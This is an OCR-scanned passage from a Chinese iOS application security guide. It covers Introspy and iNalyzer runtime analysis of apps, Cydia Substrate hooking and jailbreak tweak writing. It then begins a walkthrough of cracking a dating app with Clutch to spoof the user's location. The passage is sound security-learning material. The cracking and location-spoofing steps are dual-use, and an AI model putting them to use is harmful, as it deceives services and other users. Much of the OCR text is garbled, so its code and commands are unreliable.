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Introspy App 区 块 允许 你 选择 想 要 分 析 的 应 用 。 因 此 ， 点 击 它 ， 然 后 选择 你 想 要 分 析 的 应 用 。 
我 这 里 选择 了 Path 应 用 来 做 分 析 。 


iPod = 2:53 PM @Qi £m 


‘settings | Introspy - Apps 








La iBooks (^5 OFF ) 
imagePicker C OFF > 
B JackThreads (fy OFF) | 
jsa (* OFF) 
kjnk (fy OFF ) | 
MethodSwizzling... ( | OFF ) 
E nasa or 
国 nasa Tv Tor 
Path «x ) 
Picshare ) OFF ) 


HL 7 | Introspy 4) Settings * sse 项 都 已 选中 ， 特 别 是 选项 Log to The Console (把 日 志 
输出 到 控制 台 ) 。 如 果 我 们 选中 这 个 选项 ，|Introspy 分 析 器 将 会 把 inne 的 关于 这 个 应 用 
(app) 所 有 信息 都 输出 到 控制 台 ， 这 样 我 们 就 能 在 运行 时 看 到 这 些 信 息 
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iPod = 2:54 PM Gsm 


“Settings | Introspy - Settings 





General Settings 
























































| Log To The Console ON 


Ye 


Data Storage Profiling 
























































File System 
User Preferences 


KeyChain 


Crypto Profiling 




































































| Common Crypto 





Security Framework 


一 旦 选中 了 Path 应 用 ， 请 确保 它 没 有 在 运行 。 如 果 它 正在 运行 ， 请 退出 并 重启 Path。 另 外 ， 
请 确保 你 的 设备 和 你 的 电脑 连接 好 了 ， 因 为 我 们 想 要 看 Introspy 分 析 器 记录 的 日 志 。 同 时 ， 请 
大 家 你 机 器 上 的 Xcode (如 果 你 在 Mac 上 ) ， 到 Window-> Organizer->Devices。 在 左边 的 菜 
单 选择 你 的 设备 ， 然 后 选择 控制 台 。 现在 你 就 可 以 看 到 你 的 设备 的 日 志 。 


vE Prateek's iPod 


o Sep 17 14:57:17 Prateeks-iPod securityd[842] «Notice»: MS:Notice 
5.1.1 (98206) 


: Loading: /Library/MobileSubstrate/DynamicLibraries/libstatusbar.dylib 
图 Provisioning Profiles Sep 17 14:57:34 Prateeks-iPod securityd[844] «Notice»: MS:Notice: Installing: (null) [securityd] (698.18) 
A Applications 
Sep 17 14:57:34 Prateeks-iPod securityd[844] «Notice»: MS:Notice: Loading: /Library/MobileSubstrate/DynamicLibraries/introspy.dylib 
¿| Device Logs 
Screenshots Sep 17 14:57:34 Prateeks-iPod securityd[844] «Warning»: Introspy - Profiling disabled for (null) 
一 a iPod touch 5 
6.1 (10B141) Sep 17 14:57:34 Prateeks-iPod securityd[844] «Notice»: MS:Notice: 
¿| Device Logs 
Screenshots Sep 17 14:57:35 Prateeks-iPod crash mover[849] «Notice»: MS:Notice: Installing: (null) [crash mover] (698.18) 


Loading: /Library/MobileSubstrate/DynamicLibraries/libstatusbar.dylib 


Sep 17 14:57:35 Prateeks-iPod crash mover[849] «Notice»: MS:Notice: Loading: /Library/MobileSubstrate/DynamicLibraries/introspy.dylib 
Sep 17 14:57:35 Prateeks-iPod crash mover[849] «Warning»: Introspy - Profiling disabled for (null) 


Sep 17 14:57:35 Prateeks-iPod crash mover[849] «Notice»: MS:Notice: Loading: /Library/MobileSubstrate/DynamicLibraries/libstatusbar.dylib 





现在 开 忆 Path 应用， 然后 尽 可 能 多 的 使 用 这 个 应 用 。 同 时 ，lntrospy 分 将 会 在 后 人 台 运 行 ， 并 且 
会 尽 可 能 多 的 收集 关于 这 个 应 用 的 信息 。 你 也 可 以 看 到 设备 的 日 志 。 这 里 ， 我 们 可 以 看 到 有 
一 个 向 server 发 起 的 请 求 ， 我 们 可 以 看 到 这 个 请 求 的 所 有 内 容 ， 包 括 路 径 和 请 求 参数 。 
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Sep 17 15: 15:18:01 Prateeks-iPod Path[958] «Warning»: 


CALLED NSURLConnection initWithRequest:delegate:startImmediately: 


arguments - 
delegate - ( 
"connection:didFailWithError:", 
"connection:didCancelAuthenticationChallenge:", 
"connection:didReceiveAuthenticationChallenge:", 
"connection:canAuthenticateAgainstProtectionSpace:" 


request = { 
HTTPBody = nil; 
— = GET; ( 





vorn Hr d 
"api. ath. com" 
peraneterstring = ie 
pa = "/3/monent /comsents"; 
à = 
prai key = "ed: ids-58dd8367db4deb44a39e1278«2C50da8d88db4deb44ad5d015f*2C580da6d9d38a3ca5ddda1:94392050aa099330607304067b75e0c*20503e752e30607356b900ca01" ; 
scheme - https; 


m 
cachePolicy = 0; 
startImmediately = ð; 
returnValue = 233606928; 





Sep 17 15:18:02 Prateeks-iPod Path[958] «Warning»: PTApplication - did register for remote notifications 


并 且 现 在 ， 你 可 以 看 到 这 个 应 用 正在 使 用 NSUserDefaults 来 验证 userld 这 个 键 。 这 个 信息 其 
实 应 该 保存 在 keychain 的 。 


Sep 17 15:89:57 Prateeks-iPod Path[958] «v 
INTROSPY 


CALLED NSUserDeTaults stringForkey: 
WITH: 


arguments - 
defaultMame = userID: 


returnValue = 4AT2155BeT5Tla2b5bd558 


但 是 最 有 趣 的 的 信息 可 以 从 下 面 的 图 中 看 到 。 正 如 你 所 见 ， 这 个 应 用 使 用 —— 
验证 HangTracerEnabled 这 个 布尔 值 。 这 个 可 能 是 用 来 看 这 个 应 用 是 否 在 运行 时 被 分 析 ， 如 
果 是 的 话 ， 就 退出 。 不 过 ， 这 技巧 看 起 来 失败 了 ， 因 为 它 没有 能 够 检测 到 |ntrospy 分 析 器 

过 当 我 用 Snoop-it 分 析 Path 应 用 的 时 候 ， 它 crash 了 。 所 以 ， 这 个 布尔 值 确定 无 疑 的 是 用 - 
应 用 是 否 正 追踪 (被 分 析 ) 。 我 们 将 会 在 随后 的 文 草 中 介绍 这 些 概念 。 





除了 在 控制 台 展 示 这 个 应 用 的 运行 时 信息 ，lntrospy 也 能 够 把 它 保存 到 你 设备 上 的 一 个 sqlite 数 
据 库 中 。 从 你 的 电脑 上 ， 你 可 以 获取 这 个 数据 库 文件 并 且 |ntrospy 会 把 它 转换 成 可 展示 的 格 
式 。 要 从 你 的 iOS 设备 上 获取 这 个 数据 库 ， 首 先 你 需要 github 页 面 下 载 Introspy。 到 这 个 分 析 
器 的 目录 ， 然 后 使 用 如 下 图 的 命令 。 你 需要 指定 在 你 本 地 机 器 上 要 把 报告 保存 的 位 置 ， 同 时 
也 要 指定 你 的 iDS 设 备 的 |P 地 址 。 
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s boolForKey: 


ur 


arguments = | 
defaultNa 

| m 

re 


rue wer eR per E IE 
returnValue - 8; 





如 你 所 见 ，lIntrospy 会 要 求 你 选择 一 个 数据 库 文 件 。 这 些 数据 库 文 件 是 为 每 个 我 们 在 Settings 
中 选择 的 应 用 创建 的 。 在 这 里 ， 我 们 选择 为 Path 应 用 创建 的 数据 库 。 


python introspy.py 10.0.1.58 --outdir Path-Report 
mobile810.0.1.58's password: 
Q0. ./Applications/72581630-F432-403D-8A5C-0679FC7D3190/introspy-com. path. Path. db 
1. ./Applications/BD605BCB-968C-4D27-B8B9-22009286M4A4/introspy-com. toyopagroup . pi caboo. db 
Select the database to analyze: |j 





你 可 以 看 到 ， 这 个 数据 库 被 保存 在 当前 目录 下 面 ， 同 时 ， 当 前 目录 下 有 一 个 叫做 Path-Report 
的 文件 夹 被 创建 。 如 果 我 们 进入 那个 文件 夹 ， 并 且 打开 report.html， 下 图 就 是 我 们 将 会 看 到 
的 内 容 。 如 你 所 见 ，lntrospy 已 经 用 一 个 很 不 错 的 方法 把 全 部 信息 都 展示 出 来 了 。 我 们 可 以 看 
到 被 追踪 的 调用 和 其 参数 。。 


上 Traced Calls 


A Potential Findings 


€ Show / Hide Show All Hide All DataStorage | " Crypto | 7 Network 7 PG | * Misc | " 


1: GFBundleURLTypes CFBundleURLSchemes 
2: CFBundleURLTypes CFBundleURLSchemes 


Arguments: 


1 
"CFBundleURLMame": "com.path.path", 
"CFBundleURLScheme": "path", 
"CFBundleURLIsPrivate": "nil" 

} 


Return Value: 


3: NSUserDefaults boolForKey: 
Arguments: 


i 
"defaultMame": "NSWriteOldSstylePropertylLlists" 
} 


Return Value: 


false 


4: UlApplication setDelegate: 
5: NSUserDefaults boolForKey: 


6: C SecltemCopyMatching 


iOS 24 Wiki 


我 们 也 可 以 看 到 其 中 有 一 列 叫做 "Potential Findings"。 这 些 都 是 Introspy 认 为 存在 漏洞 的 地 
方 。 在 这 里 ， 我 们 将 看 看 存储 数据 不 安全 的 问题 。 这 可 能 不 痛 是 一 个 漏洞 ， 因 为 保存 的 信息 
不 一 定 非常 重要 。 


E Traced Calls 


4, Potential Findings 


Lack of Data Protection With NSData 


Severity 

Medium 

Description 

A file was written without any data protection options. 


Relevant function calls 


7B: NSData write ToFile: atomically: 





Arguments: 


£ 

"path": "/"var/mobile/Applications/72581630-F432-403D-8ASC-O679FC7D3190/Library/Caches/Ima 
geTables/personSmal 1-50-58. data", 

"flag": false 
} 


Return Value: 


true 


8D: NSData writeToFile:atomically: 


Arguments: 
t 
"path": "/var/mobile/Applications/72581638-F432-403D-8A5C-0679FC7D3198/Library/Caches/Ima 
geTables/personsmall-58-56.data", 
"flag": false 
} 


你 也 可 以 像 下 图 那样 ， 选 择 茶 些 选项 来 定制 你 看 到 的 信息 。 


4A Potential Findings 


© Show / Hide Show All Hide All DataSterage T Crypto | 7 Network 7 IPG | * Misc 7 


44: CFBundleURLTypes CFBundleURLSch «v Keychain - 11 


# Filesystem - 94 


45: GFBundleURLTypes CFBundleURLSch w USarPreferencags - 38 





46: UlApplication setDelegate: 

47: NSUserDefaults boolForKey: 
例如 ， 我 已 经 把 它 配置 成 只 显示 关于 UserPreferences 的 方法 。 这 个 信息 可 能 会 非常 有 用 ， 
为 它 可 以 帮 我 们 找 出 那些 可 能 被 写 入 NSUserDefaults 的 一 些 重要 信息 。 即使 没有 在 下 图 中 显 


示 ， 我 也 能 够 容易 的 知道 Path 把 我 的 用 户 id (userld) 保存 到 NSUserDefaults， 并 且 在 很 多 地 
方 都 会 用 到 (这 个 用 户 id) 。 这 个 信息 理应 保存 在 更 安全 的 地 方 ， 比 如 ，Kkeychain 。 
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e Show All Hide All DataStorage Crypto Network IPC Misc 


78: NSUserDefaults setDouble:forkey: 
Arguments: 
i 
"deftaultHMame": "PTTooFewFriendsLastTimeIncrement", 
"value": 28/3600 


Heturn Value: 


我 们 也 可 以 直接 从 命令 行 对 保存 的 数据 库 文件 进行 分 析 。 下 面 是 使 用 信息 。 





python introspy.py introspy-com.path.Path.db -h 
usage: introspy.py [-h] [-v] [-o OUTDIR] [-1] 
[-g {DataStorage,Crypto,Network, IPC ,Misc}] 
[-s {Filesystem,UserPreferences, Keychain, CommonCrypto, SecurityFramework ,HTTP , Pasteboard Schemes , XML] ] 
[-i [http,fileio,keys]] 
db 


introspy analysis and report generation tool 


positional arguments: 
db The introspy-generated database to analyze. specifying 
an IP address causes the analyzer to fetch a remote 
database. 


optional arguments: 
-h, --help show this help message and exit 
-V, --version show program's version number and exit 


html report format options: 
-o OUTDIR, --outdir OUTDIR 
Generate an HTML report and write it to the specified 
directory (ignores all other command line optons). 


command-line reporting options: 
-l, --list List traced calls (no signature analysis performed) 
-g {DataStorage,Crypto,Network,IPC,Misc}, --group iíDataStorage,Crypto,Network,IPC,Misc] 
Filter by signature group 
-s [Filesystem,UserPreferences ,Keychain, ComnonCrypto, Securi tyFramework,HTTP , Pasteboard, Schemes, XML), --sub-group íFilesystem,UserPreferences Keychain, Ca 
Crypto, SecurityFramework,HTTP , Pasteboard , Schemes , XML} 
Filter by signature sub-group 


additional command-line options: 


-i f{http,fileio,keys}, --info fhttp, fileio, keys} 
Enumerate URLs, files accessed, keychain items, etc. 


让 我 们 给 这 个 命令 传递 参数 http'。 如 你 所 见 ， 它 导出 了 一 列 通信 方 的 列表 。 





EN NO (^on introspy.py introspy-com.path.Path.db -i http 
http: //api .mixpanel .com/track/ 


http: //images .path.com.s3.amazonaws . com/photos2/c2c6fa13-9622-4879-8760-93bce3eee3ea/processed, 160x160. jpg 
https: //api .path.com/1/users/4f2f558ef5f1a26db5007aeb/devi ce. tokens . plist 

https: //api .path.com/1/users/4f2f558ef5f1a26db5007aeb/friend, requests/4f3a8afd6210042248004862 . plist 
https: //api .path.com/1/users/4f2f558ef5f1a26db5007aeb/friend, requests/50863440b099e365d300f263 . plist 


https://api .path.com/3/activity 

https: //api .path.com/3/activity?max created-1350978477&limi t-150 

https: //api . path. com/3/moment/comments?moment. ids-50dd8367db4deb44a39e1278X2C50da8d88db4deb44ad5d015f9X2C50da6d9d38a3ca5ddda1f9433X2C50aa09933060730d67b75e 
503ef52e30e07356b900ca0f 

https: //api . path. com/3/moment/comments?moment, ids-50dd8368db4deb44bc673414X2C50da8d88db4deb44ad5d0161X2C50bc7 cbc30e0735af6580c44X2C50abf93230607304d697b4.cGQ 


Q + + + * + fs + a'r wla Or nn 





Introspy 也 可 以 被 其 他 Python 脚本 导入 。 我 们 也 可 以 增加 签名 来 标志 漏洞 或 者 不 安全 的 配置 。 
我 们 将 在 随后 的 文章 中 作 介绍 。 


CK 
st 


本 文 我 们 查看 了 如 何 使 用 Introspy 对 iOS 应 用 进行 黑 盒 测试 。lntrospy 由 两 个 模块 组 成 ， 一 个 
追踪 器 ， 一 个 分 析 器 。 我 们 可 以 用 追踪 器 来 对 应 用 执行 运行 时 分 析 。 追 踪 器 会 把 信息 保存 到 

sqlite 文 件 中 以 便 后 续 用 分 析 器 分 析 ， 追 踪 器 也 可 以 把 所 有 信息 都 输出 到 设备 的 控制 台 上 。 分 
析 器 可 以 用 这 个 数据 库 文件 生成 一 个 详尽 的 HTML 报 告 。 


References 
Introspy 
https://github.com/iSECPartners/introspy 


本 文 原文 是 iOS 应 用 程序 安全 (17)- 使 用 Introspy 对 iOS 应 用 进行 黑 盒 测试 


#6 iOS 应 用 动态 分 析 下 的 更 多 文章 


iOS 安全 Wiki 


在 这 篇 文章 我 们 看 到 了 如 何 使 用 iNalyzer 对 iOS 应 用 进行 静态 分 析 。 本 文 我 们 将 看 看 如 何 用 
iNalyer 对 iOS 应 用 进行 运行 时 分 析 。 我 们 能 够 在 运行 时 调用 方法 ， 能 够 在 应 用 的 某 个 特殊 时 间 
找 出 特定 实例 变量 的 值 ， 基 本 上 能 做 我 们 用 Cycript 做 的 所 有 事情 。 


在 这 篇 文章 当中 ， sshd DOR CUN ， 并且 打开 它 看 到 了 关于 这 个 应 用 的 
类 信息 和 其 他 信息 。 我 们 将 使 用 Firefox 浏 览 器 进行 运行 j 分 析 。 这 个 工具 的 开发 者 推荐 我 再 

进行 运行 时 分 析 的 时 候 使 用 Firefox 浏 览 句 ， 因为 其 它 浏 览 器 用 起 来 可 能 会 有 问题 。 KH > xf 

我 来 说 ， 在 chrome 上 好 像 也 工作 正常 


要 打开 运行 时 解释 器 ， 首 先 需 要 打开 Doxygen 为 你 想 要 分 析 的 应 用 生成 的 index.html 文 件 ， 然 
后 双击 左 剪 头 键 。 











ta -VOER no Result 
Clear | 


P pt st t F7 8 ss 91 $ 
-—— 4. 10.0.1.23 | = 7 
Related Pages | Classes | Files | | LW Search 
Strings analysis 


b Strings analysis 








> ViewControllers | 
Info.Plist Content Analysis of Strings found in the executable 
> Embeded Strings 


> Casses SQL Strings 
hoiii URI strings 


1 1004 <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> 
2 104 Shttp://www.apple.com/appleca/root.cr10 
d 3 1252 For credits (including art credit), surf here: http://defconapp.group6.net/credits. 
| 4 1253 For help, for any questions or to report a bug, surf here: http://defconapp.group6.net 
5 132 'http://www.apple.com/appleca/iphone.crl0 
6 2330 http://$8/statuses/public timeline.json 
7 2331 http://$&8/statuses/user timeline/$6.json 
8 2332 http://%@/users/show/%@.json 
9 2333 http://$*8:*68*G/statuses/update.json 
10 2334 http://api-staging.khanfu.com/ 
11 2335 http://search.twitter.com/search.json 
12 2336 http://search.twitter.com/search.json?q-$8 
13 2337 http://www.group6.net 





14 2338 http://www.khanfu.com 


如 上 图 所 示 ， 你 可 以 看 到 有 一 个 可 以 输入 命令 的 控制 台 在 顶部 出 现 。 第 一 件 事 情 就 是 告诉 
iINalyer 你 设备 的 IP 地 址 ， 在 这 里 是 10.0.1.23。 输 入 IP 地 址 后 然后 确定 〈 按 Enter) » 


IP is setto: 10.0.1.23 


—— 





一 旦 |P 地 址 设置 好 之 后 ， 请 确保 我 们 要 分 析 的 应 用 在 设备 上 是 打开 的 (例如 ， 在 前 人 台 ) 3t 
且 你 的 设备 没有 休眠 。 这 非常 重要 ， 因 为 如 果 你 的 应 用 在 后 台 或 者 你 的 设备 在 休眠 ， 那 你 的 
应 用 是 会 被 操作 系统 给 暂 俘 的 ， 因 此 就 不 可 能 对 这 个 应 用 进行 任何 运行 时 分 析 。 


一 旦 应 用 打开 ， 在 控制 台 输 入 任意 命令 ， 如 你 使 用 Cycript 会 输入 的 一 样 。 


Co | " 
Clear | 


4) 10.0.1.23 


Related Pages Classes Files LW Search 
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正如 我 们 看 到 的 那样 ， 我 们 会 得 到 一 个 响应 。 我 们 现在 可 以 输入 我 们 想 要 输入 的 任何 cycript 命 
d 


让 我 们 隐藏 应 用 的 状态 栏 。 我 们 可 以 用 这 个 命令 ，[[UlApplication sharedApplication] 
setStatusBarHidden:YES animated: YES]; 


Go 
Clear 


([UlApplication sharedApplication] setStatusBarHidden:YES animated: YES]; 


可 以 看 到 ， 我 们 并 没有 得 到 任何 响应 ， 那 是 因为 这 个 方法 返回 空 (void) 。 





Co 
Clear 
10.0.1.23 


不 过 ， 应 用 的 状态 栏 已 经 隐藏 起 来 了 。 我 们 在 最 上 面 已 经 看 不 到 时 间 了 。 


[[UlApplication sharedApplication] setStatusBarHidden:YES animated:YES]; 


Defcon 18 


n Events 


Ll n Conspirators 





类 似 的 ， 我 们 可 以 找到 这 个 应 用 的 delegate 类 。 





Go 
Clear 
10.0.1.23 


UlApp.delegate 


我 们 也 可 以 设置 应 用 的 提醒 数字 。 这 里 我 们 设置 为 9000。 


Go 
Clear 
10.0.1.23 


可 以 看 到 ， 提 醒 数 字 成 功 设 置 。 





为 这 和 有 一 个 cycript 控 制 台 类 似 ， 我 们 也 可 以 输入 javascript 代 码 和 任何 其 他 Cycript 文 档 中 
的 命令 。 下 面 就 是 我 输入 的 从 Cycript tricks 页 面 引 用 的 一 个 命令 。 








|[[ifor (i in *UlApp)]| - NUN z l'isa"," delegate"," touchMap"," exclusiveTouchWindows"," event"," touchesEvent"," motionEvent"," remoteCont ] 
| | Clear rolEvent"," remoteControlEventObservers"," topLevelNibObjects"," networkResourcesCurrentlyLoadingCount"," - 
f 








10.0.1.23 |hideNetworkActivityIndicatorTimer"," editAlertView"," statusBar"," statusBarWindow"," observerBlocks"," mainSt 


类 似 的 ， 我 可 以 同时 用 javascript 和 Objective-C 的 语法 来 创建 函数 。 如 果 你 对 这 里 说 的 Cycript 
不 太 理解 ， 请 参考 本 系列 前 面 介绍 Cycript 和 它 的 详细 用 法 的 文 草 。 





for(var i = 0; i < *count; i++) { 
var method = methods[i]; 








methodsArray.push((selector:method getName(method), Go | 
implementation:method getlmplementation(method)]); Clear | 
| } ts : 
| free(methods); 10.0.1.23 
| free(count); 





AX, "T VA de 28. 384b JE] 3A f RC AS EST SE BI AE o 








[{selector:@selector(setTabBarController:),implementation:0x2e95}, 
{selector:@selector(setSplashView:),implementation:0x2b41}, 
{selector:@selector(applicationDocumentsDirectory),implementation:0x38dd}, 
{selector:@selector(fetchResourceWithURI:),implementation:0x2c0d}, 
fselector:@selector(initializeDataStore),implementation:0x30b1}, 
{selector:@selector(initializeUl),implementation:0x339d}, 
{selector:@selector(splashView),implementation:0x2b35}, 
{selector:@selector(window),implementation:0x2b59}, 
{selector:@selector(applicationWillTerminate:),implementation:0x3689}, 
{selector:@selector(applicationDidFinishLaunching:),implementation:0x2f6d}, 
{selector:@selector(setWindow:),implementation:0x2e6d}, 

| {selector:@selector(tabBarController),implementation:0x2b4d}, 

-一 一 一 - {selector:@selector(connection:didFailWithError:),implementation:0x36f5}, 
10.0.1.23 fselector:@selector(connection:didReceiveData:),implementation:0x3 80d}, 
{selector:@selector(connectionDidFinishLoading:),implementation:0x390d}, 
{selector:@selector(connection:didReceiveResponse:),implementation:0x2b3 1], 
| {selector:@selector(activeDownloads),implementation:0x2e1d}, 

| {selector:@selector(setActiveDownloads:),implementation:0x2ebd}, 
{selector:@selector(dealloc),implementation:0x2d 3d}, 
{selector:@selector(persistentStoreCoordinator),implementation:0x3239}, 
{selector:@selector(managedObjectModel),implementation:0x2b65}, 
{selector:@selector(managedObjectContext),implementation:0x2ba1}] «br» 
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在 本 系列 的 第 9 部 分 ， 我 们 介绍 了 Snoop-it。iNalyer 和 Snoop-it 非 常 类 似 。 不 过 二 者 都 有 优点 
和 不 足 。 在 本 文 写 关 于 Snoop-it 的 时 候 ， 它 并 不 支持 method swizzling 而 iNalyer 支 持 。 葡 丝 
的 ，iNalyer 不 允许 我 们 监控 API 调 用 而 Snoop-it 可 以 。 因 此 ， 这 两 个 应 用 都 有 它们 的 优点 和 不 
Ro 


总 结 
本 文 我 们 学 习 了 如 何 利 用 iNalyer 来 对 iOS 应 用 进行 运行 时 分 析 。 对 于 任何 对 iOS 应 用 程序 安全 
怀 兴 趣 的 人 来 说 ，iNalyer 都 是 武器 库 中 非常 棒 的 工具 ， 它 使 得 我 们 的 工作 更 容易 、 更 有 效 


iOS 安全 Wiki 


References 
iNalyzer https://appsec-labs.com/iNalyzer 


本 文 原文 是 iOS 应 用 程序 安全 (16)- 使 用 iNalyzer 对 iOS 应 用 进行 动态 分 析 


#6 iOS 应 用 动态 分 析 下 的 更 多 文章 


6.8 使 用 iNalyzer 进 行动 态 分 析 222 


本 草 介绍 了 使 用 GDB、Cycript 等 工具 对 iOS 应 用 进行 动态 分 析 的 各 种 方法 ， 欢 迎 大 家 实践 。 


#6 iOS 应 用 动态 分 析 下 的 更 多 文章 
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Cydia Substrate 


Cydia Substrate( 以 前 叫做 MobileSubstrate) 是 一 个 框架 ， 允 许 第 三 方 的 开发 者 在 系统 的 方法 
里 打 一 些 运 行 时 补丁 ， 扩 展 一 些 方 法 ， 类 似 OS X 上 的 Application Enhancer 。 


saurik 为 Substrate 写 了 非常 全 的 介绍 文档 。 
Cydia Substrate 有 3 部 分 组 成 : 


e MobileHooker 
e MobileLoader 
e safe mode 


MobileHooker 
MobileHooker 用 来 替换 系统 函数 ， 这 个 过 程 也 叫 Hooking。 有 如 下 的 API 可 以 使 用 : 


IMP MSHookMessage(Class class, SEL selector, IMP replacement, const char* prefix); // pre 
void MSHookMessageEx(Class class, SEL selector, IMP replacement, IMP *result); 


void MSHookFunction(void* function, void* replacement, void** p original); 


eee 





ee 来 替换 Dbjective-C 的 函数 ，MSHookFunction 用 来 替换 C/C++ 函 数 。 
体 用 法 参见 过 里 和 dx 


MobileLoader 


MobileLoader 把 第 3 方 补丁 程序 加 载 进入 运行 的 程序 中 。 MobileLoader à AAI it 

DYLD INSERT _LIBRARIES 把 自己 加 载 进入 目标 程序 ， 然 后 它 会 

在 儿 Library/MobileSubstrate/DynamicLibraries/ 中 找到 需要 加 载 的 动态 链接 库 并 加 载 它 们 ， 控 
制 是 否 加 载 到 "we ， 是 通过 一 人 1 on 的 。 如 果 需 要 被 加 载 的 动态 库 的 名 称 叫 做 
foo.dylib， 那 么 这 个 plist 文 件 就 叫做 foo.plist， 这 个 里 面 有 一 个 字段 叫做 filter » €. d 5 9] 3; X 
hook 进 的 目 F 8) bundle id ° 


Hike » de IRA 78 X foo. dylibZ« R 3t ASpringBoard * AA at & AY plist X 4 "P A filters ez 72 3x FF 
与 : 


Filter = ( 
Bundles = (com.apple.springboard); 


If 


关于 使 用 DYLD_INSERT_LIBRARIES 来 注入 代码 的 例子 可 以 参见 这 里 


Safe mode 


3 554 /& 3 5«SpringBoard crash &? H 4& * MobileLoader 2 di RANAR ^ AUS ib 3E 
入 安全 模式 。 在 安全 模式 中 ， 所 有 的 第 3 方 扩 展 都 会 被 茶 用 。 


下 面 这 些 signal 会 触发 安全 模式 : SIGTRAP SIGABRT SIGILL SIGBUS SIGSEGV SIGSYS 
小 结 


Ax f&j 34-28 T Cydia Substarte。 后 面 要 介绍 的 越狱 程序 Tweak， 就 是 利用 Cydia Substrate 
中 的 MobileLoader 来 加 载 的 。 


# iOS 越 狱 程序 编写 下 的 更 多 文章 


开发 越狱 程序 和 日 第 开发 的 iOS 程 序 很 相似 ， 不 过 ， 越 狱 程序 能 做 更 强大 的 事情 。 你 的 设备 越 
狱 之 后 ， 你 就 能 够 hook 进 Apple 提 供 的 几乎 所 有 的 class， 来 控制 iPhone/iPad 的 功能 。 


在 3.6 Theos : 越狱 程序 开发 框架 这 一 节 ， 我 们 详细 介绍 了 如 何 安装 Theos 以 及 各 种 工具 ， 头 
文件 下 载 地 址 ， 以 及 编译 出 错 的 各 种 情况 的 解决 方法 。 


也 介绍 了 如 何 创 建 TWeak 和 把 Tweak 程 序 部 署 到 iOS 设 备 上 。 


之 前 我 在 blog 上 也 写 过 几 篇 文章 


iOS 越 狱 程序 开发 (1) 一 工具 篇 
Eaa A iki 
OSRE FFR (3) 一 hut First Tweak 
iOS 越 狱 程序 开发 (4) 一 


词 Joey 在 其 blog 上 也 分 享 了 一 篇 文章 使 用 Theos 做 一 个 简单 的 Mobile Substrate Tweak ， 
绍 了 如 何在 锁 屏 界面 增加 一 个 UlLabel 显 示 一 行文 字 ， 欢 迎 前 往 阅 读 。 


a. ana 
Tweak， 建 议 边 阅读 边 实 践 。 


ho FR id BY FEAT Je] A> THz 会 我 和 WS 2 或 者 微 信 公 ARIK: IOSH AD X 留言 。 


#7 OSAR RET SSTSX 


确定 目标 

第 一 步 是 确定 目标 ， 即 你 要 分 析 的 App， 你 需要 在 这 个 App 上 编写 Tweak 完 成 的 功能 ， 比 如 挂 
钓 SpringBoard 使 得 吕 面 启动 的 时 候 弹 框 ， 或 者 拦截 某 个 具体 的 应 用 的 特定 API 调 用 ， 获 得 关 
键 信 息 。 

导出 头 文件 

确定 目标 之 后 ， 就 可 以 利用 Clutch 先 破解 App， 然 后 利用 class-dump-z 导 出 头 文件 ， 找 到 你 感 
兴趣 的 类 ， 对 它 进 行 分 析 。 

获得 类 的 方法 

有 时 候 ， 头 文件 没有 所 有 方法 调用 的 信息 ， 这 个 时 候 你 可 以 利用 cycript， 使 用 之 前 介绍 的 
trick， 上 比如 printMethod 打 印 出 所 有 的 方法 。 

编写 Tweak 

这 一 步 你 应 该 拿 到 需要 Hook 的 类 以 及 对 应 的 方法 ， 利 用 [Tweak 编 写 简介 ] (http://security.ios- 
wiki.com/issue-7-2/) 中 介绍 的 技术 编写 Tweak。 

安装 与 测试 


把 上 一 步 的 Tweak 安 装 到 你 的 设备 上 ， 验 证 你 的 Tweak 是 否 工作 正常 。 


#7 iOS 越 狱 程序 编写 下 的 更 多 文章 


本 章 简要 介绍 了 Cyida Substrate，Tweak 程 序 编写 的 一 般 步骤 ， 下 一 章 ， 我 们 将 应 用 之 前 学 
到 的 内 容 进行 实战 。 


#7 iOS 越 狱 程序 编写 下 的 更 多 文章 


修改 茶 陌 生 人 交友 软件 的 位 置信 息 


本 章 我 们 将 简要 介绍 如 何 分 析 App 并 编写 Tweak。 比 如 ， 使 用 某 陌 生 人 交友 软件 的 时 候 ， 在 其 
第 2 个 tab， 发 现 这 个 tab， 会 使 用 当前 用 户 所 在 的 地 理 位 置 ， 推 荐 周边 的 用 户 和 群 组 。 
那么 ， 有 方法 做 到 伪装 自己 的 地 理 位 置 么 ， 即 做 到 如 下 的 效果 : 


Pad <> 48:59 ONE pad 党 


发 现 


e 


炸弹 斗 地 主 


17 | 
L/0 77 AEST 








如 上 图 ， 我 们 能 随意 更 改 自 己 的 位 置 么 ， 比 如 改 成 北京 ? 


我 们 将 分 析 看 看 是 否 能 做 到 ， 请 继续 阅读 后 面 的 章节 。 


#8 修改 某 陌 生 人 交友 软件 的 位 置信 息 下 的 更 多 文章 


导出 头 文件 


使 用 前 面 文章 介绍 的 Clutch(4.3 Clutch : iOS 应 用 破解 工具 ) 破 解 IPA， 然 后 把 IPA 拷 贝 到 Mac 
a 


然后 使 用 Mac 上 安装 的 class-dump-z( 使 用 class-dump-z 获 得 IOS 应 用 程序 的 类 信息 ) 就 可 以 导 
出 头 文 件 。 具 体 使 用 方法 请 参阅 上 述 两 篇 文章 。 


分 析 头 文件 
这 里 我 们 的 需求 和 地 理 位 置 有 关系 ， 我 们 首先 搜索 下 关于 Location 的 文件 。 
我 们 找到 这 个 文件 : MomoLocationManager.h 。 


其 内 容 如 下 : 


woes 
* This header is generated by class-dump-z 0.2a. 
* class-dump-z is Copyright (C) 2009 by KennyTM-, licensed under GPLv3. 


* Source: (null) 
24 


#import <XXUnknownSuperclass.h> // Unknown library 
#import "CLLocationManagerDelegate.h" 


@class CLLocation, CLLocationManager, NSDate, NSTimer; 


. attribute ((visibility("hidden"))) 
@interface MomoLocationManager : XXUnknownSuperclass <CLLocationManagerDelegate> { 

CLLocationManager* locManager; 

CLLocation* location; 

CLLocation* reviseLocation; 

CLLocation* fakeLocation; 

BOOL correctLocation; 

NSTimer* timer; 

BOOL isLocationing; 

NSDate* beginDate; 

NSDate* lastLocTime; 
j 
@property(retain, nonatomic) CLLocation* fakeLocation; 
@property(retain, nonatomic) CLLocation* reviseLocation; 
@property(retain, nonatomic) CLLocation* location; 
@property(copy, nonatomic) NSDate* lastLocTime; 
@property(retain, nonatomic) CLLocationManager* locManager; 
@property(retain, nonatomic) NSDate* beginDate; 
*(id)shareMomoLocationManager; 
-(id)distanceBetweenLocationDictionary:(id)dictionary; 
-(BOOL)isOriginLocationValid; 
-(BOOL)isReviseLocationValid; 
-(void)locationManager:(id)manager didFailWithError:(id)error; 
